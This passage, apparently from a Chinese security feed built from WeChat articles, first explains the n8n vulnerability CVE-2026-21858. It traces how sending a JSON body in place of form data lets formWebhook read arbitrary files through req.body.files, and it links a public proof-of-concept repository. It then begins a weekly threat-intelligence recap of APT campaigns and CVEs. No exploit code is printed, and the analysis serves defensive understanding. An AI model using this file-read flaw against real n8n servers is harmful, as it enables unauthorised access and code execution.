[&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;title&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malup26b5lj&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://mmbiz.qpic.cn/mmbiz_png/OxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ/640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">04</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf="" mpa-font-style="mf53v17x21qs" style="font-size: 18px;" data-mpa-action-id="mf53v18b123g" data-pm-slice="0 0 []">洞见</span></p></div></div></div></div><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><h4 style="text-align:left;line-height:1.7;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;" data-pm-slice="0 0 []"><span style="font-size:12pt;font-weight:bold;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf="">复现截图</span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;mf53qk7t1bas&#34;,&#34;data-pm-slice&#34;:&#34;4 3 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-mpa-template\&#34;:\&#34;t\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;,\&#34;data-mpa-action-id\&#34;:\&#34;malurube3fq\&#34;,\&#34;data-pm-slice\&#34;:\&#34;0 0 []\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;\&#34;,\&#34;data-mid\&#34;:\&#34;\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;\&#34;,\&#34;data-mid\&#34;:\&#34;\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 2em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;&#34;,&#34;data-font-family&#34;:&#34;default&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 10px;color: rgb(178, 178, 178);font-weight: bold;">[2]</span></span></span></span></h4><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6167800453514739" data-s="300,640" data-type="png" data-w="882" style="width:100%;" type="block" data-backw="529" data-backh="326" data-imgfileid="100027353" src="https://wechat2rss.xlab.app/img-proxy/?k=a79e872a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWUkdQIU0c1KKG9v6X415JbkMicBkewZqwnbiaOlsFz0icojL0P1oFhlIq0jGEbFJyzvmLuyrDzhm0xew%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="text-align: left;line-height: 1.3;margin: 3pt 0pt;text-indent: 0px;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(51, 51, 51);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: bold;">漏洞分析</span></span></span></p></li></ul><p style="text-indent: 2em;margin-bottom: 16px;"><span leaf=""><span textstyle="" style="font-size: 14px;">我们对比下正常请求和非正常请求的处理流程，以此来理解漏洞。</span></span></p><p style="text-indent: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">正常情况是 multipart/form-data，流程如下：</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">1.LiveWebhooks.executeWebhook 调用 WebhookHelpers.executeWebhook；</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">2.parseRequestBody 检测到 multipart/form-data，走 parseFormData()；</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">3.parseFormData 用 formidable 解析真实上传内容，生成临时文件路径；</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">4.WebhookService.runWebhook → FormTriggerV2.webhook → formWebhook；</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">5.formWebhook 调 prepareFormReturnItem，读取 req.body.files（formidable 输出的真实文件）；</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">6.prepareFormReturnItem → copyBinaryFile，读取临时上传文件路径。</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">在 application/json 下的流程是：</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">1.LiveWebhooks.executeWebhook 调用 WebhookHelpers.executeWebhook；</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">2.parseRequestBody  检测到application/json 走 parseBody()（不经过formidable）；</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">3.parseBody 对json类型用jsonParse解析；</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">4.WebhookService.runWebhook → FormTriggerV2.webhook → formWebhook；</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">5.formWebhook 调 prepareFormReturnItem，读取 req.body.files（用户请求传入的任意文件）；</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">6.prepareFormReturnItem-&gt;copyBinaryFile，读取任意文件。</span></span></p><p style="text-align: left;text-indent: 2em;"><span leaf=""><span textstyle="" style="font-size: 14px;">可以看到二者的差异主要是在是否用formidable解析上传的文件，并设置files为指定路径formWebhook错误的信任前期对请求的预处理，这让我想起了之前Orange Tsai 在httpd上发现的一系列Confusion Attacks</span><span textstyle="" style="font-size: 10px;color: rgb(178, 178, 178);font-weight: bold;">[3]</span><span textstyle="" style="font-size: 14px;">也是类似的信任前期节点的处理从而导致出现问题。</span></span></p><p style="text-align: left;text-indent: 2em;"><span leaf=""><span textstyle="" style="font-size: 14px;">在类似的软件开发中，每个节点应该做好充足的校验，不要直接信任前置节点的处理结果。</span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="malyjiiv20l2"><div style="width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 12px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;justify-content: flex-start;align-items: center;padding: 20px 14px 0px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;align-items: flex-start;" data-mid="" mpa-from-tpl="t"><div style="transform: skew(30deg);display: flex;justify-content: center;align-items: center;align-items: flex-start;" data-mid="" mpa-from-tpl="t"><div style="background: #004af6;text-align: center;padding: 0px 8px;height: 28px;" data-mid="" mpa-from-tpl="t"><p style="transform: skew(-30deg);font-weight: bold;font-size: 18px;color: #004af6;line-height: 28px;text-align: center;-webkit-background-clip: text;background-image: linear-gradient(163deg, #ffffff 0%, #a5c0ff 100%);word-break: break-all;-webkit-text-fill-color: transparent;" data-mid="" mpa-is-content="t"><span leaf="">参考链接</span></p></div></div></div></div></div></div></div><p style="text-align: left;line-height: 1.5em;margin: 0px 0pt;"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span style="text-decoration: none;font-size: 13px;" mpa-font-style="mf53onod1e3x"><span leaf="" mpa-font-style="mf53qk7919hs" style="font-size: 13px;"><span textstyle="" style="font-size: 13px;">[1]   </span></span></span></span><span style="font-size: 13px;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default" mpa-font-style="mf53qk7921kd"><span style="font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;mdeb7ech16ky&#34;,&#34;data-pm-slice&#34;:&#34;4 4 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-mpa-template\&#34;:\&#34;t\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;,\&#34;data-mpa-action-id\&#34;:\&#34;malurube3fq\&#34;,\&#34;data-pm-slice\&#34;:\&#34;0 0 []\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;\&#34;,\&#34;data-mid\&#34;:\&#34;\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;\&#34;,\&#34;data-mid\&#34;:\&#34;\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;&#34;,&#34;data-font-family&#34;:&#34;default&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 13px;">Ni8mare  -  Unauthenticated Remote Code Execution in n8n (CVE-2026-21858) | Cyera Research Labs</span></span></span></span></p><p style="text-align: left;line-height: 1.5em;margin: 0px 0pt;"><span style="font-size: 13px;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default" mpa-font-style="mf53qk7921kd"><span style="font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 13px;color: rgb(0, 82, 255);"><a href="https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858" target="_blank">https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858</a></span></span></span></span></p><p style="margin-top: 0px;margin-bottom: 0px;line-height: 1.5em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 13px;">[2] </span></span><span leaf=""><span textstyle="" style="font-size: 13px;">GitHub - Chocapikk/CVE-2026-21858: n8n Ni8mare - Unauthenticated Arbitrary File Read to RCE Chain (CVSS 10.0)</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;line-height: 1.5em;"><span leaf=""><span textstyle="" style="font-size: 13px;color: rgb(0, 82, 255);"><a href="https://github.com/Chocapikk/CVE-2026-21858" target="_blank">https://github.com/Chocapikk/CVE-2026-21858</a></span></span></p><p style="margin-top: 0px;margin-bottom: 0px;line-height: 1.5em;"><span leaf=""><span textstyle="" style="font-size: 13px;color: rgb(0, 0, 0);">[3] </span></span><span leaf=""><span textstyle="" style="font-size: 13px;color: rgb(0, 0, 0);">Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server! | Orange Tsai</span></span></p><p style="margin-top: 0px;margin-bottom: 0px;line-height: 1.5em;"><span leaf=""><span textstyle="" style="font-size: 13px;color: rgb(0, 82, 255);"><a href="https://blog.orange.tw/posts/2024-08-confusion-attacks-en/" target="_blank">https://blog.orange.tw/posts/2024-08-confusion-attacks-en/</a></span></span></p></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="%27%27">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=523fa933&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511005%26idx%3D1%26sn%3Db5b4aa6ee28a9331ff4c0cf194b40db8">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 22 Jan 2026 16:11:00 +0800</pubDate>
    </item>
    <item>
      <title>情报每周回顾 2025-12-29</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247510999&amp;idx=1&amp;sn=75224fcf9e5f821a6f5352b7a68b7b47</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>腾讯威胁情报中心</span> <span>2025-12-29 16:30</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=c8b94799&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6AoQM3RKCWXia1xKyza7Ss8zBicD2yNRmw9icYzd75vXsxribMKvpTsLicwAvpbtY7GAJzfjISjhtBz2BUsELR8zkXw%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="template" mpa-from-tpl="t" data-mpa-action-id="md8hqhg218sw"><div data-mpa-template="t" mpa-from-tpl="t"><div data-mpa-category="模板" data-mpa-template-rows="1" yb-mpa-mark="mark-header" style="width: 100%;" data-mid="" data-mpa-template="t" mpa-from-tpl="t"><div style="width: 100%;display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;z-index: 1;padding: 0 5px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;flex-direction: column;padding: 17px 10px 14px 10px;background: #FFFFFF;box-shadow: 0px 2px 4px 0px rgba(60, 131, 250, 0.15);" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;align-items: flex-end;justify-content: space-between;padding: 0 0 3px 0;border-bottom: 1.3px dashed rgba(60, 131, 250, 0.3);" data-mid="" mpa-from-tpl="t"><p style="width: 47px;height: 9px;display: flex;justify-content: center;align-items: center;margin: 0 0 2px 0;flex-shrink: 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050100" class="rich_pages wxw-img" data-ratio="0.19148936170212766" data-w="94" src="https://wechat2rss.xlab.app/img-proxy/?k=0e691e32&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FHm2rIuksic6yohBk0Kia6W2Hhud1zoaEKFP2yZP0QHMxOicJykLUjiaiayTcgicdqhq5HURXYibhM3y7fMIZHZhMWn5ng%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 12px;color: rgba(60, 131, 250, 0.6);line-height: 17px;letter-spacing: 1px;word-break: break-word;" data-mid=""><span leaf="">腾讯云安全威胁情报中心</span></p></div></div><div style="width: 100%;padding: 14px 0 10px 0;display: flex;align-items: flex-start;justify-content: space-between;border-bottom: 1.3px dashed rgba(60, 131, 250, 0.3);" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p yb-mpa-mark="mark-header-title" style="font-weight: bold;font-size: 54px;color: #3C83FA;line-height: 55px;letter-spacing: 3px;word-break: break-word;" data-mid=""><span leaf="">摘要概览</span></p></div><div style="flex-shrink: 0;background: #3C83FA;width: 79px;padding: 3px 0 5px 0;display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="text-align: center;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 16px;color: #FFFFFF;line-height: 20px;word-break: break-word;" data-mid=""><span leaf="">每周一篇</span></p></div><div style="text-align: center;align-self: center;background: #FFFFFF;border-radius: 1px;padding: 2px 3px 1px 3px;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 14px;color: #3C83FA;line-height: 16px;word-break: break-word;" data-mid=""><span leaf="">情报追踪</span></p></div></div></div><div style="display: flex;align-items: flex-start;width: 100%;justify-content: space-between;padding: 18px 0 0 0;" data-mid="" mpa-from-tpl="t"><div style="display: flex;border-width: 1px;border-style: solid;border-color: rgba(40, 44, 51, 0.2);" data-mid="" mpa-from-tpl="t" data-mpa-action-id="md8kr8bk1rdn" data-pm-slice="0 0 []"><div style="text-align: center;padding: 1px 12px 0 9px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;color: #282C33;line-height: 21px;letter-spacing: 1px;word-break: break-word;" data-mid=""><span leaf="" mpa-font-style="md8kr8al1tgn" style="font-size: 14px;">2025年12月</span></p></div><div style="text-align: center;background: #3C83FA;padding: 1px 12px 0 12px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;color: #FFFFFF;line-height: 21px;word-break: break-word;" data-mid=""><span leaf="" mpa-font-style="md8krkjx1e1y" style="font-size: 11px;" data-mpa-action-id="md8krkkyw5a" data-pm-slice="0 0 []">12.22-12.28</span></p></div></div><p style="width: 80px;height: 14px;display: flex;justify-content: center;align-items: center;flex-shrink: 0;margin: 4px 0 0 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050097" class="rich_pages wxw-img" data-ratio="0.175" data-w="160" src="https://wechat2rss.xlab.app/img-proxy/?k=5a83ae18&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FchaiaZrj8iadrPWzLAFuXVKr31TUA1zIQs9pWSZ5jGicicdj7xjxPibjNcticLgOywtdWGic8tLqJ0fQF39tSd6nWoMXw%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p></div><p style="width: 10px;height: 9px;display: flex;justify-content: center;align-items: center;margin: 17px 0 -9px 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050104" class="rich_pages wxw-img" data-ratio="0.9" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=39f68913&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FnLKDrIxQFEEGkn0pFIwOMM5pPQzficCmVP1JWibI5z0miaKzMLYicUZkkF7N1PJkialw9IakBGQumOItHETEaaa0jRw%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p><div style="width: 100%;text-align: left;padding: 0 17px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="md8hw5bc23fc" data-pm-slice="0 0 []"><p><span leaf="" mpa-font-style="md8hwswb23en" style="font-size: 16px;" data-mpa-action-id="md8hwswqeph" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【家族团伙事件】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">Turla利用卫星通信漏洞隐匿控制中心，对目标机构发动精准攻击</span></p></li><li style="font-size:13px;"><p><span leaf="">PaperWerewolf借助恶意Excel加载项传播XLL文件，突破传统防御实现后门秘密植入</span></p></li><li style="font-size:13px;"><p><span leaf="">NoName057用混合战术发起大规模DDoS攻击，致核心系统瘫痪与服务中断</span></p></li><li style="font-size:13px;"><p><span leaf="">SilentLynx利用不明网络手法入侵Terport内部系统，成功获取关键信息</span></p></li><li style="font-size:13px;"><p><span leaf="">SideWinder伪造税务邮件诱导受害者点击短链接下载恶意文件，实施远程控制与数据窃取</span></p></li></ul><p><span leaf="" mpa-font-style="md8hx4foxsq" style="font-size: 16px;" data-mpa-action-id="md8hx4g416kq" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【热点攻击手段】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">伪造交通罚款短信诱骗用户提供信用卡相关信息</span></p></li><li style="font-size:13px;"><p><span leaf="">通过Excel XLL加载项结合漏洞RAR隐蔽实现恶意代码长期控制</span></p></li><li style="font-size:13px;"><p><span leaf="">利用社工钓鱼、恶意文档投递及AV图标伪装实施攻击，可能引发受害系统数据破坏与情报窃取</span></p></li><li style="font-size:13px;"><p><span leaf="">伪造邮件和钓鱼页面假冒ADP公司，达成账户接管与敏感信息窃取</span></p></li><li style="font-size:13px;"><p><span leaf="">利用MSI有效载荷投递LNK恶意软件，实现远程指令、窃系统信息与持久后门建立</span></p></li></ul><p><span leaf="" mpa-font-style="md8hxiy01bal" style="font-size: 16px;" data-mpa-action-id="md8hxiyhg7z" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【重点漏洞情报】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:14px;font-weight:normal;"><p><span leaf="">n8n 远程代码执行漏洞（CVE-2025-68613）</span></p></li><li style="font-size:14px;font-weight:normal;"><p><span leaf="">Net-SNMP snmptrapd 缓冲区溢出漏洞（CVE-2025-68615）</span></p></li><li style="font-size:14px;font-weight:normal;"><p><span leaf="">MongoDB 信息泄露漏洞（CVE-2025-14847）</span></p></li><li style="font-size:14px;font-weight:normal;"><p><span leaf="">WatchGuard Fireware OS 越界写入漏洞（CVE-2025-14733）</span></p></li><li style="font-size:14px;font-weight:normal;"><p><span leaf="">Langflow SSRF 服务器端请求伪造漏洞（CVE-2025-68477）</span></p></li></ul></div><p style="width: 10px;height: 9px;display: flex;justify-content: center;align-items: center;align-self: flex-end;margin: -9px 0 0 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050102" class="rich_pages wxw-img" data-ratio="0.9" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=343f759b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FlEA1fhJ8dPY8CTT6cndXkb6ur6jwOSHJZrUN8G5PHYmGgEsFZFiaAS4vMZEBibcYNe26PC6afBZcvSWSDxLCzJ9A%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px #222CFF;" data-mid=""><span leaf="">01</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8in1abcbk" style="font-size: 20px;" data-mpa-action-id="md8in1bg1b37" data-pm-slice="0 0 []">家族团伙事件</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" 